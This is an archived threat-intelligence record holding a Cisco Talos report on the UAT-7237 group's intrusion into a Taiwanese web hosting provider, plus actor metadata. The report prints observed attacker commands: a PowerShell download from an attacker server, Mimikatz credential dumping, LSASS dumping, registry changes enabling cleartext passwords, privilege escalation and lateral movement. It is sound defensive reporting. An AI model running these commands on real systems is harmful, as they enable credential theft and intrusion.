{
	"id": "b8a306ca-d6d3-478c-bc76-cfd547064911",
	"created_at": "2026-04-06T00:19:45.026766Z",
	"updated_at": "2026-04-10T03:36:18.958609Z",
	"deleted_at": null,
	"sha1_hash": "33763c536d461fc1237fdea8c73051ea7da47e93",
	"title": "UAT-7237 targets Taiwanese web hosting infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 105339,
	"plain_text": "UAT-7237 targets Taiwanese web hosting infrastructure\r\nBy Asheer Malhotra\r\nPublished: 2025-08-15 · Archived: 2026-04-02 10:36:57 UTC\r\nCisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since\r\nat least 2022, which has significant overlaps with UAT-5918.\r\nUAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies\r\nheavily on the use of open-source tooling, customized to a certain degree, likely to evade detection and\r\nconduct malicious activities within the compromised enterprise.\r\nUAT-7237 aims to establish long-term persistence in high-value victim environments.\r\nTalos also identified a customized shellcode loader in UAT-7237's arsenal that we track as “SoundBill.”\r\nSoundBill can be used to decode and load any shellcode, including Cobalt Strike.\r\nTalos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on\r\nestablishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of\r\nopen-source tools, customized to a certain extent, including the use of a customized shellcode loader we track as\r\n“SoundBill.”\r\nTalos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of\r\n
threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918.\r\nAdditionally, both threat groups develop, customize and operate tooling using the Chinese language as their\r\nprimary language of choice.\r\nWhile Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics,\r\ntechniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:\r\nUAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant, while UAT-5918 relies\r\nprimarily on Meterpreter-based reverse shells.\r\nAfter a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's\r\ndeployment of web shells is highly selective and only on a chosen few compromised endpoints.\r\nWhile UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a\r\ncombination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the\r\nsame.\r\nIn a recent intrusion, UAT-7237 compromised, infiltrated and established long-term persistence in a Taiwanese\r\nweb hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim\r\n
organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform\r\nseveral malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke\r\nmalware, setting up backdoored access via VPN clients, network scanning and proliferation.\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 1 of 7\n\nInitial access and reconnaissance\r\nUAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet.\r\nOnce the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts\r\nrapid fingerprinting to evaluate whether the target is worth conducting further malicious actions on.\r\nReconnaissance consists of identifying remote hosts, both internal and on the internet:\r\ncmd /c nslookup \u003cvictim’s_domain\u003e\r\ncmd /c systeminfo\r\ncmd /c curl\r\ncmd /c ping 8[.]8[.]8[.]8\r\ncmd /c ping 141[.]164[.]50[.]141  // Attacker-controlled remote server.\r\ncmd /c ping \u003cvictim’s_domain\u003e\r\ncmd /c ipconfig /all\r\nWhile UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237\r\ndeviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access and later\r\naccess the systems via RDP:\r\ncmd /c c:\\temp\\WM7Lite\\download[.]exe hxxp[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar c:\\temp\\\r\npowershell (new-object System[.]Net[.]WebClient).DownloadFile('hxxp[://]141[.]164[.]50[.]141/sdksdk60\r\nOnce UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to\r\nadditional systems in the enterprise to proliferate and conduct malicious activities:\r\ncmd[.]exe /c cd /d \"\u003cremote_smb_share\u003e\"\u0026net use\r\ncmd[.]exe /c cd /d \"\u003cremote_smb_share\u003e\"\u0026dir \\\\\u003cremote_smb_share\u003e\\c$\\\r\n
cmd[.]exe /c cd /d \"C:\\\"\u0026net group \"domain admins\" /domain\r\ncmd[.]exe /c cd /d \"C:\\\"\u0026net group \"domain controllers\" /domain\r\nIn addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows\r\nManagement Instrumentation (WMI) based tooling during reconnaissance and proliferation, such as SharpWMI\r\nand WMICmd:\r\ncmd[.]exe /c cd /d \"C:\\\"\u0026C:\\ProgramData\\dynatrace\\sharpwmi[.]exe \u003cIP\u003e \u003cuser\u003e \u003cpass\u003e cmd whoami\r\ncmd.exe /c cd /d \"C:\\DotNet\\\"\u0026WMIcmd.exe\r\nwmic /node:\u003cIP\u003e /user:Administrator /password:\u003cpass\u003e process call create cmd.exe /c whoami\r\nwmic /node:\u003cIP\u003e /user:Administrator /password:\u003cpass\u003e process call create cmd.exe /c netstat -ano \u003ec:\\\r\nSharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary\r\ncommand and code execution.\r\nUAT-7237 fingerprinted any systems subsequently accessed using rudimentary Windows commands such as:\r\ncmd.exe /c systeminfo\r\ncmd.exe /c tasklist\r\ncmd.exe /c net1 user /domain\r\ncmd.exe /c whoami /priv\r\ncmd.exe /c quser\r\nPost-compromise tooling and actions on objectives\r\nSoundBill\r\nAfter compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a range of\r\ntasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is\r\nbuilt based on “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named\r\n“ptiti.txt” and execute the resulting shellcode.\r\n
It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese\r\ninstant messaging application, and are likely used as decoy files in attacks involving spear phishing.\r\nSoundBill’s payload (i.e., the shellcode) may be anything, for example a customized implementation of\r\nMimikatz:\r\nVTSB.exe privilege::debug sekurlsa::logonpasswords exit\r\nOr it may be a mechanism to execute arbitrary commands on the infected system, such as:\r\nc:\\temp\\vtsb.exe -c whoami\r\nThe shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long-term\r\naccess for information stealing. So far, the Cobalt Strike beacons Talos has found to be compatible with\r\nSoundBill communicate over HTTPS with their command and control (C2):\r\ncvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws\r\nJuicyPotato\r\nUAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to\r\nexecute multiple commands on endpoints, such as:\r\ncmd.exe /c c:\\hotfix\\juicy2.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami\r\nConfiguration changes\r\nOn several occasions during intrusions, UAT-7237 attempted to make configuration and setting changes to the\r\nWindows OS on the infected endpoints, such as disabling User Account Control (UAC) restrictions via the registry:\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPoli\r\nThey also attempted to enable storage of cleartext passwords:\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_\r\nUAT-7237 also accessed the Component Services management console, likely to adjust privileges for their\r\nmalicious components:\r\nmmc comexp.msc\r\nUAT-7237's pursuit of credentials\r\n
UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints.\r\nHowever, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection, by\r\nusing a Mimikatz instance built into SoundBill to extract credentials:\r\nFilename/command | Tooling name\r\nabc.dll | Comsvcs.dll for LSASS process dumping\r\nFileless.exe | Mimikatz\r\nVTSB.exe privilege::debug sekurlsa::logonpasswords exit | SoundBill with the Mimikatz payload\r\nFurthermore, UAT-7237 also finds VNC credentials and configuration on infected endpoints by searching the\r\nregistry and disk:\r\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\r\ndir c:\\*vnc.ini /s /b\r\nAnother (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file\r\nand another executable — again for credential extraction:\r\ncmd.exe /c C:\\hotfix\\invoketest.exe -cmd \"cmd /c C:\\hotfix\\1.bat\"\r\ncmd.exe /c C:\\hotfix\\invoketest.exe -cmd \"cmd /c C:\\hotfix\\Project1.exe C:\\hotfix\\SSP.dll\"\r\n
“Project1[.]exe” above is the ssp_dump_lsass project on GitHub. It takes a DLL file as an argument and injects it into\r\nthe Local Security Authority Service (LSASS) process, which then dumps the LSASS process into a BIN file.\r\nOptionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:\r\ncmd.exe /c c:\\hotfix\\juicy2.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} -p \"c:\\windows\\system\r\nThe process dump obtained is then staged into an archive for exfiltration:\r\ncmd.exe /c \"c:\\program files\\7-Zip\\7z.exe\" a C:\\hotfix\\1.zip C:\\hotfix\\1.bin\r\nProliferating through the enterprise\r\nUAT-7237 uses the following network scanning tooling:\r\nFScan: A network scanner used to scan for open ports across IP subnets:\r\nfileless -h 10.30.111.1/24 -nopoc -t 20\r\nSMB scans: To identify SMB service information on specific endpoints:\r\nsmb_version 10.30.111.11 445\r\nAs soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using\r\ncredentials they’ve extracted previously:\r\ncmd[.]exe /c netstat -ano |findstr 3389\r\ncmd[.]exe /c nslookup \u003cvictim’s_subdomains\u003e\r\ncmd[.]exe /c net use \u003cIP\u003e\\ipc$ \u003cpass\u003e /user:\u003cuserid\u003e\r\ncmd[.]exe /c dir \\\\\u003cremote_system\u003e\\c$\r\ncmd[.]exe /c net use \\\\\u003cremote_system\u003e\\ipc$ /del\r\nSoftEther VPN\r\nThe remote server hosting the SoftEther VPN client consisted of two archives: one containing the client\r\nexecutable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based\r\nserver binary.\r\nTalos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:\r\nThe server was created in September 2022 and was last used in December 2024, indicating that UAT-7237\r\nmay have been using SoftEther over a two-year period.\r\n
UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language\r\nconfiguration file, indicating that the operators were proficient with the language.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.\r\nSecure Access provides seamless, transparent and secure access to the internet, cloud services or private\r\napplications no matter where your users work. Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\n
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort rules cover this threat:\r\nSnort v2: 64908 - 64916\r\nSnort v3: 301209 - 301212\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here.
\r\nSource: https://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/"
	],
	"report_names": [
		"uat-7237-targets-web-hosting-infra"
	],
	"threat_actors": [
		{
			"id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7",
			"created_at": "2023-06-23T02:04:34.793629Z",
			"updated_at": "2026-04-10T02:00:04.971054Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Bronze Silhouette",
				"Dev-0391",
				"Insidious Taurus",
				"Redfly",
				"Storm-0391",
				"UAT-5918",
				"UAT-7237",
				"UNC3236",
				"VOLTZITE",
				"Vanguard Panda"
			],
			"source_name": "ETDA:Volt Typhoon",
			"tools": [
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "09031838-56db-4676-a2b2-4bc50d8b7b0b",
			"created_at": "2024-01-23T13:22:35.078612Z",
			"updated_at": "2026-04-10T02:00:03.519282Z",
			"deleted_at": null,
			"main_name": "Flax Typhoon",
			"aliases": [
				"Ethereal Panda",
				"Storm-0919"
			],
			"source_name": "MISPGALAXY:Flax Typhoon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "86c7abc2-1b71-4665-b9e3-1594d6d15a4a",
			"created_at": "2023-09-07T02:02:47.367254Z",
			"updated_at": "2026-04-10T02:00:04.698935Z",
			"deleted_at": null,
			"main_name": "Flax Typhoon",
			"aliases": [
				"Ethereal Panda",
				"RedJuliett"
			],
			"source_name": "ETDA:Flax Typhoon",
			"tools": [
				"BadPotato",
				"CHINACHOPPER",
				"China Chopper",
				"JuicyPotato",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Metasploit",
				"Mimikatz",
				"SinoChopper",
				"SoftEther VPN"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7074cc97-be8f-417b-8294-124c3add8668",
			"created_at": "2025-05-29T02:00:03.190761Z",
			"updated_at": "2026-04-10T02:00:03.84828Z",
			"deleted_at": null,
			"main_name": "UAT-5918",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-5918",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea4726a4-3b7c-45db-a579-2abd4986941c",
			"created_at": "2025-11-01T02:04:53.002048Z",
			"updated_at": "2026-04-10T02:00:03.764362Z",
			"deleted_at": null,
			"main_name": "BRONZE FLAXEN",
			"aliases": [
				"Ethereal Panda ",
				"Flax Typhoon "
			],
			"source_name": "Secureworks:BRONZE FLAXEN",
			"tools": [
				"Bad Potato",
				"Juicy Potato",
				"Metasploit",
				"Mimikatz",
				"SoftEther VPN"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ba78141a-9e8e-4662-91b1-e09dbb802e29",
			"created_at": "2026-02-03T02:00:03.439277Z",
			"updated_at": "2026-04-10T02:00:03.939587Z",
			"deleted_at": null,
			"main_name": "UAT-7237",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-7237",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434785,
	"ts_updated_at": 1775792178,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.pdf",
		"text": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.txt",
		"img": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.jpg"
	}
}